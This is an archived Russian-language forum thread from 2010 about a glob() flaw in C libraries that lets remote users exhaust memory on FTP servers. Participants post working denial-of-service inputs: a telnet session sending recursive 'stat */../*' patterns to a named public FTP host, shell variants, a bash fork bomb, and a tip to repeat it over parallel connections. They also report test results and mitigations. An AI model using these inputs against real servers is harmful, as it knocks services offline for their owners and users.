URL: https://www.opennet.ru/cgi-bin/openforum/vsluhboard.cgi
Форум: vsluhforumID3
Нить номер: 11324
[ Назад ]
Исходное сообщение
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено opennews , 07-Окт-10 17:56 
Ошибка в реализации функции glob() в различных Си-библиотеках, например в glibc и BSD libc (http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-...),  может быть использована удалённым атакующим, чтобы нарушить работу FTP/SFTP серверов. В связи с тем, что на многих серверах разрешён анонимный вход, ошибку легко эксплуатировать и многие программные продукты являются уязвимыми. В отчёте (http://securityreason.com/securityalert/7822) утверждается, что серверы даже таких крупных компаний, как Adobe и HP, подвержены этой проблеме.


Проблема возникла из-за того, что переменная GLOB_LIMIT, которую добавили в 2001 году для ограничения объёма памяти функцией glob() c целью защиты от аналогичной уязвимости (http://www.opennet.ru/base/netsoft/1007055482_116.txt.html), не эффективна. Проверка на совпадение (globbing) вызывает функцию glob(), чтобы сравнить список файлов с шаблоном и вернуть на выход список совпадающих файлов. В виду того, что GLOB_LIMIT не действует в сит...

URL: http://securityreason.com/securityalert/7822
Новость: http://www.opennet.ru/opennews/art.shtml?num=28210

Содержание
Сообщения в этом обсуждении
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено anonymus , 07-Окт-10 17:56 
Закроют, чай не мелокомягкие
Ну и в серьезных проектах совсем без ошибок не бывает, как это не печально.
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Аноним , 07-Окт-10 17:56 
vsftpd не использует, ни glob(), ни fnmatch().
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Аноним , 07-Окт-10 18:45 
> vsftpd не использует, ни glob(), ни fnmatch().

Спасибо! А то я уже полез апдейты смотреть :)

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено анонимус , 07-Окт-10 18:04 
У меня на сервачке uClibc. Можно спать спокойно?
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено EuPhobos , 07-Окт-10 18:43 
> У меня на сервачке uClibc. Можно спать спокойно?

А можно IP вашего сервачка?

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Аноним , 07-Окт-10 20:50 
192.168.1.13 =)
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено АдминистыйБородач , 07-Окт-10 21:46 
Эй, откуда ты узнал секретный адрес моего банковского терминала?!


"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено БородатыйОдмин , 07-Окт-10 21:44 
Легко! 10.11.12.13
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено EuPhobos , 07-Окт-10 21:51 
> Легко! 10.11.12.13

За натом в основном всегда можно спать спокойно, но кайфа от НАТ-а никакого )

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено User294 , 07-Окт-10 22:26 
> А можно IP вашего сервачка?

127.0.0.1

Удачного взлома! :)

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено pavlinux , 08-Окт-10 00:46 
>> А можно IP вашего сервачка?
>127.0.0.1
>Удачного взлома! :)

Вроде не тинэйджер... :/

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено AdVv , 08-Окт-10 16:15 
>>> А можно IP вашего сервачка?
>>127.0.0.1
>>Удачного взлома! :)
> Вроде не тинэйджер... :/

Физический возраст не всегда соответствует умственному развитию :(

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено User294 , 08-Окт-10 17:44 
> Вроде не тинэйджер... :/

Да просто локальный DoS как-то особо не получился. А я то уж понадеялся OOM киллером отхватить :)

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено maxkit , 07-Окт-10 18:36 
>  серверы даже таких крупных компаний, как Adobe

Переживут. Весь мир на дырявом Flash'е сидит.

Но новость, конечно, неприятная.

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Аноним , 07-Окт-10 18:41 
vsftpd подтверждает своё название
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено fakedream , 08-Окт-10 16:14 
Еще бы он пофункциональнее был чуть ..
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено luzerz , 07-Окт-10 18:53 
эксплоит то где?)
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено аноним , 07-Окт-10 19:21 
> эксплоит то где?)

$ telnet ftp.microsoft.com 21
user anonymous
pass opennet
stat */../*/../*/../*/../*
stat */../*/../*/../*/../*test
и весь эксплоит

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено ноним , 07-Окт-10 19:53 
т.е. на локальной фс stat */../*/../*/../*/../*  тоже сработает ?
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Аноним , 07-Окт-10 21:48 
Работает, zsh отъедает по 4 мега в секунду. Правда, я не стал дожидаться, пока память кончится, и прибил.
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Аноним , 08-Окт-10 07:52 
> Работает, zsh отъедает по 4 мега в секунду. Правда, я не стал
> дожидаться, пока память кончится, и прибил.

забавно, в csh, на fb8:
# stat */../*/../*/../*/../*
/usr/sbin/stat: Argument list too long.


proftpd-1.3.2b:
stat */../*/../*/../*/../*/../*
211-Status of */../*/../*/../*/../*/../*:
End of status
211 Out of memory during globbing of */../*/../*/../*/../*/../*

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено MrClon , 08-Окт-10 10:02 
220 ProFTPD 1.3.2d Server (MrClon Server) [192.168.10.1]
user anonymous
331 Anonymous login ok, send your complete email address as your password
pass evil_hucker
230 Anonymous access granted, restrictions apply
stat */../*/../*/../*/../*
550 */../*/../*/../*/../*: Forbidden command argument
stat */../*/../*/../*/../*test
550 */../*/../*/../*/../*test: Forbidden command argument

Что я делаю не так? Может «експлоит» кривой?

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено аноним , 07-Окт-10 18:54 
че-то по-моему этот баг только в bsd и есть. ProFTPd выдает банальный:
211 Out of memory during globbing of */../....
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено аноним , 07-Окт-10 19:18 
У меня на фре 8.1 так же. А на линуксе proftpd упал.
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено oops , 07-Окт-10 23:42 
freebsd 8.1 amd64 + pure-ftpd - все ок, ничего не падает.
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено pimiento , 08-Окт-10 07:01 
gentoo i686, pure-ftpd не упало
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Stax , 07-Окт-10 19:01 
Ну в редхате поддерживается только vsftpd, который "проблеме не подвержен", так что наверное у них нет необходимости дергаться и резко латать проблему. Потихонечку исправят.. Строго говоря, по оригинальной ссылке сказано, кто подвержен проблеме: netbsd/openbsd/freebsd/solaris, системы adobe/hp/etc, а про редхат, дебиан и пр. ничего не сказано.
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено XoRe , 08-Окт-10 21:59 
> Ну в редхате поддерживается только vsftpd, который "проблеме не подвержен", так что
> наверное у них нет необходимости дергаться и резко латать проблему. Потихонечку
> исправят.. Строго говоря, по оригинальной ссылке сказано, кто подвержен проблеме: netbsd/openbsd/freebsd/solaris,
> системы adobe/hp/etc, а про редхат, дебиан и пр. ничего не сказано.

Скажите, а вы правда не знаете, что такое glibc?

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Dmitriy.trt , 07-Окт-10 19:21 
В Debian используется eglibc. Возможно, там просто нет этой проблемы.
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Sylvia , 07-Окт-10 19:55 
eglibc - набор патчей над glibc
если уж в bsd libc есть ошибка, то в форке от glibc и подавно


интересно другое, кроме ФТП серверов вызывают ли glob() какие либо еще программы ? и насколько это может быть использовано злоумышленниками

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено аноним , 07-Окт-10 20:17 
> интересно другое, кроме ФТП серверов вызывают ли glob() какие либо еще программы ? и насколько это может быть использовано злоумышленниками

Конечно, баш, например:
  ls */../*/../*/../*/../*
эффект будет примерно эквивалентный
  -(){ -&-;};-
в смысле, сожрет всю память и повесит машину, если не настроены правильные лимиты

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Аноним , 07-Окт-10 20:38 
$ ls */../*/../*/../*/../*
bash: /bin/ls: Слишком длинный список аргументов
$
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено аноним , 07-Окт-10 20:48 
> bash: /bin/ls: Слишком длинный список аргументов

А так?
echo /*/*/../*/../*/../*/../*

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено аноним , 07-Окт-10 20:51 
> А так?
> echo /*/*/../*/../*/../*/../*

По сабжевой статье там должен быть несуществующий файл, то есть:
  echo /*/*/../*/../*/../*/../*fake

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Иван Иванович Иванов , 07-Окт-10 21:39 
bash: Killed out of memory

Клёво :) Local DOS :)

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено prapor , 08-Окт-10 02:48 
А на ZSH не сработало. Проц жрёт и всё. Память не меняется.
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Аноним , 08-Окт-10 07:57 
> А на ZSH не сработало. Проц жрёт и всё. Память не меняется.

В csh тоже тупо одно ядро съедет и все, правда еще пришлось через -9 убивать

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено oops , 08-Окт-10 09:04 
а у меня на csh по-тихоньку память жрало
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено тигар , 08-Окт-10 10:18 
сколько ждал?
я минут 5, память не жрало, только, как написали выше проц, 1 ядро. head, i386, 3 недельной давности
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено anonymous , 07-Окт-10 20:40 
где можно статейку прочитать про настройку этих димитов?
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено аноним , 07-Окт-10 20:49 
> где можно статейку прочитать про настройку этих димитов?

man limits.conf

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено аноним , 08-Окт-10 09:01 
>> интересно другое, кроме ФТП серверов вызывают ли glob() какие либо еще программы ? и насколько это может быть использовано злоумышленниками
> Конечно, баш, например:
>   ls */../*/../*/../*/../*
> эффект будет примерно эквивалентный
>   -(){ -&-;};-
> в смысле, сожрет всю память и повесит машину, если не настроены правильные
> лимиты

На Debian начало отъедать память, пришлось килять

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Doc_x800 , 08-Окт-10 11:43 
>>> интересно другое, кроме ФТП серверов вызывают ли glob() какие либо еще программы ? и насколько это может быть использовано злоумышленниками
>> Конечно, баш, например:
>>   ls */../*/../*/../*/../*
>> эффект будет примерно эквивалентный
>>   -(){ -&-;};-
>> в смысле, сожрет всю память и повесит машину, если не настроены правильные
>> лимиты
> На Debian начало отъедать память, пришлось килять

OpenSUSE 11.3
Linux Doc 2.6.31.5-0.1-default #1 SMP 2009-10-26 15:49:03 +0100 i686 i686 i386 GNU/Linux

та же ситуация

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено аноним , 07-Окт-10 20:23 
> и насколько это может быть использовано злоумышленниками

может быть использовано для подвешивания собственной машины :)

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено zazik , 08-Окт-10 09:41 
> eglibc - набор патчей над glibc
> если уж в bsd libc есть ошибка, то в форке от glibc
> и подавно
> интересно другое, кроме ФТП серверов вызывают ли glob() какие либо еще программы
> ? и насколько это может быть использовано злоумышленниками

Через php/perl/etc можно сделать а-ля exec('glob ...').

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Аноним , 07-Окт-10 19:26 
пока что имеем уязвимость не в большинстве фтп серверов, а только в proftpd
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Аноним , 08-Окт-10 07:59 
> пока что имеем уязвимость не в большинстве фтп серверов, а только в
> proftpd

proftpd-1.3.2b под freebsd: 211 Out of memory during globbing of /*/*/../*/../*/../*/../*fake

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено ананим , 07-Окт-10 19:57 
несправедливо мс исключена из упоминания:
>Affected Vendors (not verified):
>- - Apple
>- - Microsoft Interix
>- - HP
>- - more more more

.

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено XoRe , 08-Окт-10 22:05 
> несправедливо мс исключена из упоминания:
>>Affected Vendors (not verified):
>>- - Apple
>>- - Microsoft Interix
>>- - HP
>>- - more more more

not verified

P.S.
На генте х64 bash с такой строкой жрет проц, но память жрет только до 158 метров.

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Аноним , 07-Окт-10 20:32 
Vsftpd проблеме не подвержен.

Ну очень радует)

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено diceman , 07-Окт-10 21:14 
на фре proftpd выдал листинг файла с правами, владельцами и прочим
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Аноним , 08-Окт-10 08:00 
> на фре proftpd выдал листинг файла с правами, владельцами и прочим

сделай команду подлинее, получишь: 211 Out of memory during globbing

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено аноним , 08-Окт-10 18:02 
> сделай команду подлинее, получишь: 211 Out of memory during globbing

Если "Out of memory" - это еще хорошо. Это значит что ошибка была корректно обработана. А если оно подвиснет на несколько минут - то это дос.

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено QuAzI , 08-Окт-10 09:51 
Как? Как ты это сделал, демон?
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено evgeny_t , 07-Окт-10 22:58 
stat */../*/../*/../*/../*
bash: /usr/bin/stat: Argument list too long
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено PereresusNeVlezaetBuggy , 07-Окт-10 23:06 
Ключевой diff: http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c....

Кривой он какой-то... и сделан аж три месяца назад. Приплыли, товарищи.

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено V , 08-Окт-10 00:30 
что-то не получается у меня повесить proftpd под openbsd
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено PereresusNeVlezaetBuggy , 08-Окт-10 00:34 
> что-то не получается у меня повесить proftpd под openbsd

Видимо, корректно обрабатываются ситуации с нехваткой памяти.

Я проверил на ksh — отожрало вплоть до лимита, выругалось на нехватку, и начало постепенно отдавать память взад.

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено PereresusNeVlezaetBuggy , 09-Окт-10 09:42 
>> что-то не получается у меня повесить proftpd под openbsd
> Видимо, корректно обрабатываются ситуации с нехваткой памяти.
> Я проверил на ksh — отожрало вплоть до лимита, выругалось на нехватку,
> и начало постепенно отдавать память взад.

Фикс для OpenBSD таки закоммичен: http://marc.info/?l=openbsd-cvs&m=128657455002435&w=2

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено r9ft , 08-Окт-10 06:52 
Ubuntu:

stat */../*/../*/../*/../*
550 */../*/../*/../*/../*: Forbidden command argument
stat */../*/../*/../*/../*test
550 */../*/../*/../*/../*test : Forbidden command argument

в bash echo /*/*/../*/../*/../*/../*test - начинает сжирать память

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено User294 , 08-Окт-10 17:41 
На 64-битной при попытке сделать stat на такую строку - баш съедает гига полтора и минут 5 тупит. После чего сообщает Argument list too long. Работает сугубо под рутом и только если сменить текущую диру на /. В общем у меня полноценного локального DoS особо не получилось, только возможность скушать прилично ресурсов на несколько минут.
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено i , 08-Окт-10 09:04 
pureftpd в gentoo не падает, bash память жрет... но лимиты спасают.
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено phantom lord , 08-Окт-10 09:14 
Отлично, как раз юзаю Vsftpd :-)
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Аноним , 08-Окт-10 09:15 
в макоси bash память жрет тоже и умирает
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено QuAzI , 08-Окт-10 10:36 
Забавно.
proftpd-1.3.2b   - бага не проявилась.
proftpd-1.3.3a_1 - бага проявилась.
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено sysnet.by , 08-Окт-10 14:18 
SLES 11.0
ProFTPD 1.3.2b Server - )))))))) только корректное сообщение о "дебильной" команде

220 ProFTPD 1.3.2b Server (FTP Skif) [10.34.0.114]
331 Password required for spectre
Password:
230 User spectre logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
ftp> ls */../*/../*/../*/../*/../*
229 Entering Extended Passive Mode (|||7126|)
150 Opening ASCII mode data connection for file list
226-Out of memory during globbing of */../*/../*/../*/../*/../*
226 Transfer complete
ftp>

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено zazik , 08-Окт-10 14:25 
У меня bash уперся в 3 гига и так и остался висеть.
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено MrClon , 08-Окт-10 14:31 
Какая ОС, версия libc, bash ну и так далее?
На своём debian сервере и бубунтовых рабочих станциях так и не смог воспроизвести баг :(
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено zazik , 08-Окт-10 14:37 
> Какая ОС, версия libc, bash ну и так далее?
> На своём debian сервере и бубунтовых рабочих станциях так и не смог
> воспроизвести баг :(

OpenSUSE(как релиз посмотреть - не знаю, это не удобнейшая фря), libc-2.11.1,
GNU bash, version 3.2.51(1)-release (x86_64-suse-linux-gnu)

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено аноним , 08-Окт-10 19:17 
> OpenSUSE(как релиз посмотреть - не знаю

Вроде, везде работает:
cat /etc/*release*

"Ошибка в библиотЕке libc привела к уязвимости большинства FTP"
Отправлено аноним , 08-Окт-10 21:54 
> Вроде, везде работает:
> cat /etc/*release*

Точно
cat /etc/*/../*/../*/../*/../*release

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено zazik , 11-Окт-10 10:35 
>> OpenSUSE(как релиз посмотреть - не знаю
> Вроде, везде работает:
> cat /etc/*release*

# cat /etc/SuSE-release
SUSE Linux Enterprise Server 11 (x86_64)
VERSION = 11
PATCHLEVEL = 1

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено Nas_tradamus , 08-Окт-10 15:30 
На Pure не прокатило, слава зайцам.
"'прокатываемость' зависит от параметра"
Отправлено аноним , 08-Окт-10 17:43 
> На Pure не прокатило, слава зайцам.

С какими параметрами не прокатило? Там подходящий путь зависит от приложения и количества подкаталогов. У меня на proftpd команда:
  stat */../*/../*/../*/../*/../*
выдает 211 Out of memory during globbing of ...
но команда:
  stat */../*/../*/../*/../*
подвешивает proftpd и сжирает 100% cpu. Сделать это 10 раз на параллельных соединенях - и DoS готов.

И, да, дополнительно надо проверять:
  stat */../*/../*/../*/../*testtest
это должно почти не требовать памяти, но подвесит точно так же.

PS: блин, вроде не лор же, а такие простые замечания приходится делать...

"'прокатываемость' зависит от параметра"
Отправлено Nas_tradamus , 08-Окт-10 18:17 
>[оверквотинг удален]
>   stat */../*/../*/../*/../*/../*
> выдает 211 Out of memory during globbing of ...
> но команда:
>   stat */../*/../*/../*/../*
> подвешивает proftpd и сжирает 100% cpu. Сделать это 10 раз на параллельных
> соединенях - и DoS готов.
> И, да, дополнительно надо проверять:
>   stat */../*/../*/../*/../*testtest
> это должно почти не требовать памяти, но подвесит точно так же.
> PS: блин, вроде не лор же, а такие простые замечания приходится делать...

Да блин, я все понимаю. В Pure-FTPD вообще не работают никакие комбинации.

ftp> stat */../*/../*/../*/../*/../*
Connected to ftp.site.ru.
No proxy connection.
Mode: stream; Type: binary; Form: non-print; Structure: file
Verbose: on; Bell: off; Prompting: on; Globbing: on
Store unique: off; Receive unique: off
Case: off; CR stripping: on
Quote control characters: on
Ntrans: off
Nmap: off
Hash mark printing: off; Use of PORT cmds: on
Tick counter printing: off
ftp>


Игрался минут 5 с stat, ls и добавлением фэйкового файла в конце - не работает.

В ProFTPD работает, как и в bash. Но на моих серваках с ProFTPD нет левых людей и анонимусов.

"'прокатываемость' зависит от параметра"
Отправлено аноним , 08-Окт-10 19:07 
> ftp> stat */../*/../*/../*/../*/../*

А через ftp оно и у меня не работало. Зато работало через telnet.

"'прокатываемость' зависит от параметра"
Отправлено аноним , 08-Окт-10 19:11 
> ftp> stat ...

stat в ftp-клиенте имеет другое назначение. Это - не тот stat. :)

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено аноним , 08-Окт-10 21:47 
Решение для proftpd - вписать в proftpd.conf:
  UseGlobbing off

ЗЫ: дежавю? http://bugs.proftpd.org/show_bug.cgi?id=1066

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено V , 09-Окт-10 00:02 
2001-й год, 5 баллов! :)
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Отправлено аноним , 10-Окт-10 00:08 
того и гляди злобные анонимусы будут ходить по серверам и их "тестировать"... а может и робота-обходчика подрядят...